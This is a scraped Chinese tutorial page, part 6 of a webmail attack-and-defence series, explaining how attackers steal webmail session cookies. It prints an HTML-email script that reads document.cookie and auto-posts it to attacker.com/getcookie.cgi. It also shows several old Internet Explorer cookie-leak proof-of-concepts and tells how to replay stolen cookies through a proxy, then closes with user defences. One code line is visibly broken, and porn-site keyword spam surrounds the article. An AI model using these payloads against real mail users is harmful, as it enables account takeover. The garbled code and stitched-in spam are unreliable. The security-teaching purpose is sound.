亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 服務器 > Mail服務器 > 正文

Webmail攻防實戰(6)_Mail服務器教程

2024-09-08 23:46:25
字體:
來源:轉載
供稿:網友
  如果攻擊者能夠獲取用戶WebMail的cookie信息,那么就能很容易地侵入用戶的WebMail。攻擊者如何獲取用戶WebMail的cookie信息呢?如果攻擊者在用戶的電腦上安裝了木馬,或者能夠從網絡線路上對用戶進行嗅探偵聽,那么獲取cookie信息自然不成問題,不過這并不是我們討論問題的意義所在,因為都能夠這樣了,又何必大費周折去獲取cookie信息,直接獲取郵箱密碼就是了。

  如果WebMail系統存在跨站腳本執行漏洞,那么攻擊者就能欺騙用戶從而輕易地獲取cookie信息,雖然眾多網站存在此漏洞,但存在此漏洞的WebMail系統還很少見。

  含有惡性腳本程序的html郵件能使攻擊者獲取WebMail的cookie信息。Html郵件中的腳本程序先提取當前WebMail的cookie信息,然后把它賦值給某個表單元素,再將表單自動提交給攻擊者,攻擊者從而獲得cookie會話信息。下面是一段演示程序:

<body>
<form method="post" action="http://attacker.com/getcookie.cgi" name="myform">
<input name="session" type="hidden">
</form>

<script language="JavaScript">
var cookie=(document.cookie);
alert(cookie);//這一句用于顯示當前cookie信息,當然,攻擊者不會這樣做。
document.myform.session.value=cookie;
document.myform.submit();
</script>

  getcookie.cgi是放在攻擊者Web服務器上的一個cgi程序,用于獲取表單提交過來的cookie信息,并且做記錄或者通知攻擊者。當然,攻擊者會把html郵件、getcookie.cgi程序設計得更隱蔽,更具欺騙性,讓用戶難以察覺。

  通常,瀏覽器根據web服務器的域名來分別保存cookie信息,并且只會把cookie信息發送給同一域名的Web服務器。不過,瀏覽器的漏洞給攻擊者獲取不同域名的cookie信息創造了機會,Internet Explorer、Netscape和Mozilla等被廣泛使用的瀏覽器都存在過此類漏洞。下面是幾個Internet Explorer瀏覽器(針對IE5.0、IE5.5或ie6.0)泄漏cookie信息的例子:

  (1) Html語言中的object元素用于在當前頁面內嵌入外部對象,但Internet Explorer瀏覽器對object元素屬性的處理不當會導致任意域的cookie信息被泄漏,演示代碼如下:

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.,5000);
</script>

  (2) Internet Explorer瀏覽器錯誤處理“about”協議使得一個精心構造的URL請求可能會顯示或修改任意域的cookie信息,例如(以下代碼在同一行):

  about://www.anydomain.com/<script language=JavaScript>alert(document.cookie);</script>

  (3) Internet Explorer瀏覽器會誤把URL中“%20”(空格符的URL編碼)字符串之前的主機名當做cookie信息所在的域,并且發送出去。假設攻擊者有一個域名“attacker.com”,攻擊者把它做成泛域名解析,即把“*.attacker.com”指向攻擊者Web服務器所在的IP地址,“attacker.com”下的任何子域名或主機名都會被解析成這個IP地址,當用戶提交了類似下面這樣的URL后,瀏覽器就會把“anydomain.com”域名的cookie信息發送給攻擊者:

  http://anydomain.com%20.attacker.com/getcookie.cgi

  如果攻擊者要獲取WebMail的臨時型cookie信息,就會在html郵件中寫入相應的代碼,在用戶瀏覽郵件時,該代碼自動執行,使得攻擊者能夠獲取當前瀏覽器里的臨時cookie信息,也可以把用于獲取cookie信息的URL發送給用戶,誘騙用戶打開該URL,這樣攻擊者也能獲取臨時cookie信息。

  在攻擊者獲取cookie信息后,如果cookie信息里含有密碼等敏感信息,那么攻擊者就能很輕易地侵入用戶的郵箱,雖然hotmail等WebMail系統曾經發生過此類的情況,但cookie信息泄漏敏感信息的WebMail系統還很少見。

  攻擊者在獲取cookie信息之后,還要讓此cookie信息由瀏覽器來存取從而與WebMail系統建立會話,這樣才能侵入用戶的WebMail。如果是持久型cookie信息,攻擊者所要做的是把這個信息復制到自己的cookie文件中去,由瀏覽器存取該cookie信息從而與WebMail系統建立會話,不過臨時cookie信息存儲在內存中,并不容易讓瀏覽器存取。

  為了讓瀏覽器存取臨時cookie信息,攻擊者可以編輯內存中的cookie信息,或者修改公開源代碼的瀏覽器,讓瀏覽器能夠編輯cookie信息,不過這樣都不是很簡便的方法,簡便的方法是使用Achilles程序(packetstormsecurity.org網站有下載)。Achilles是一個http代理服務器,能夠載取瀏覽器和Web服務器間的http會話信息,并且在代理轉發數據之前可以編輯http會話以及臨時cookie信息。

  WebMail系統應該避免使用持久型cookie會話跟蹤,使攻擊者在cookie會話攻擊上不能輕易得逞。為了防止cookie會話攻擊,用戶可以采取如下措施以加強安全:

  (1) 設置瀏覽器的cookie安全級別,阻止所有cookie或者只接受某幾個域的cookie。

  (2) 使用cookie管理工具,增強系統cookie安全,如Cookie Pal、Burnt Cookies等。

  (3) 及時給瀏覽器打補丁,防止cookie信息泄漏。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美激情视频在线| 国产精品一区二区三区久久久| 亚洲国产成人av在线| 欧美精品久久久久久久| 全亚洲最色的网站在线观看| 日韩美女在线播放| 亚洲天堂久久av| 日韩在线视频中文字幕| 精品久久国产精品| 国产精品高潮在线| 国语自产偷拍精品视频偷| 国产精品精品视频一区二区三区| 亚洲图片在线综合| 日韩中文字幕欧美| 91在线中文字幕| 亚洲成人av片在线观看| 91国内免费在线视频| 国产99在线|中文| 成人激情视频在线观看| 日韩一二三在线视频播| 日韩欧美在线视频日韩欧美在线视频| 国产欧美一区二区三区四区| 亚洲精品久久久久久久久久久| 亚州欧美日韩中文视频| 中文字幕不卡在线视频极品| 91精品免费视频| 日产日韩在线亚洲欧美| www.亚洲天堂| 九九九久久久久久| 青青久久aⅴ北条麻妃| 国产精品热视频| 日韩av在线导航| 亚洲国产精品999| 91av福利视频| 亚洲综合在线小说| 丝袜美腿精品国产二区| 久久久久久91香蕉国产| 欧美亚洲另类制服自拍| 国产免费一区二区三区在线观看| 中文字幕精品在线| 欧美大肥婆大肥bbbbb| 久久综合久中文字幕青草| 国内精品国产三级国产在线专| 精品国产福利在线| 亚洲人成在线免费观看| 日韩小视频在线| 日韩中文字幕不卡视频| 亚洲成人久久久久| 国产精品国产三级国产专播精品人| 欧美xxxx14xxxxx性爽| 欧美电影在线免费观看网站| 国产成人精品在线| 国产在线播放91| 麻豆成人在线看| 亚洲无线码在线一区观看| 亚洲影院色在线观看免费| 久久精品国产一区| 亚洲自拍偷拍色图| 91精品国产99久久久久久| 欧美乱人伦中文字幕在线| 国产一区二区成人| 九九热这里只有在线精品视| 亚洲最大成人免费视频| 久久人人爽人人爽人人片亚洲| 欧美日韩中文字幕在线视频| 国产精品扒开腿做爽爽爽视频| 欧美二区在线播放| 亚洲精品美女免费| 亚洲欧美日韩中文在线制服| 欧美亚洲另类制服自拍| 日韩在线观看免费| 国产网站欧美日韩免费精品在线观看| 欧美人与物videos| 91人人爽人人爽人人精88v| 国产成人一区二区三区| 亚洲va欧美va国产综合久久| 成人激情免费在线| 欧洲s码亚洲m码精品一区| 亚洲人成伊人成综合网久久久| 国产欧美一区二区三区视频| 亚洲女人天堂av| 91国在线精品国内播放| 欧美亚洲日本网站| 亚洲综合在线小说| 亚洲国产精品久久久久秋霞不卡| 亚洲成人a级网| 亚洲日韩欧美视频| 欧美精品videos另类日本| 最新91在线视频| 亚洲精品国产免费| 青草热久免费精品视频| 亚洲综合一区二区不卡| 欧美大片免费观看| 国内精品美女av在线播放| 亚洲天堂免费观看| 色黄久久久久久| 久久久久久久久国产| 亚洲影视中文字幕| 91九色国产社区在线观看| 米奇精品一区二区三区在线观看| 亚洲性69xxxbbb| 久久久这里只有精品视频| 国产精品成人播放| 亚洲精品av在线播放| 国产网站欧美日韩免费精品在线观看| 久久青草精品视频免费观看| 国产精品视频xxxx| 136fldh精品导航福利| 97在线视频免费| 欧美最近摘花xxxx摘花| 综合欧美国产视频二区| 日韩精品在线观看一区二区| 亚洲视频日韩精品| 亚洲品质视频自拍网| 97免费视频在线| 亚洲国产精品va在线看黑人动漫| 国产免费观看久久黄| 亚洲成年人在线播放| 亚洲国产精彩中文乱码av在线播放| 久久躁日日躁aaaaxxxx| 福利视频第一区| 久久精品国产欧美亚洲人人爽| 正在播放亚洲1区| 亚洲欧美资源在线| 成人av在线天堂| 亚洲аv电影天堂网| 欧美一区二区三区精品电影| 国产成人高潮免费观看精品| 亚洲自拍偷拍在线| 国产精品男人爽免费视频1| 日本亚洲欧洲色α| 美女扒开尿口让男人操亚洲视频网站| 久久久久这里只有精品| 日韩影视在线观看| 成人黄色生活片| 日韩在线中文字| 亚洲国产成人精品电影| 国产成人精品视频在线观看| 日韩精品免费在线观看| 亚洲а∨天堂久久精品9966| 国产欧美 在线欧美| 北条麻妃在线一区二区| 国产亚洲欧洲高清| 国产精品一区二区性色av| 亚洲天堂开心观看| 在线免费看av不卡| 国内精品久久久| 亚洲老板91色精品久久| 日韩视频一区在线| 久久精品99国产精品酒店日本| 欧美日韩高清区| 亚洲福利影片在线| 日韩免费av一区二区| 久久伊人91精品综合网站| 亚洲另类激情图| 91中文精品字幕在线视频| 久久久精品国产网站| 亚洲成人黄色网| 日韩精品高清视频| 超碰日本道色综合久久综合| 韩国视频理论视频久久| 91免费高清视频| 日韩精品中文字幕在线| 成人www视频在线观看|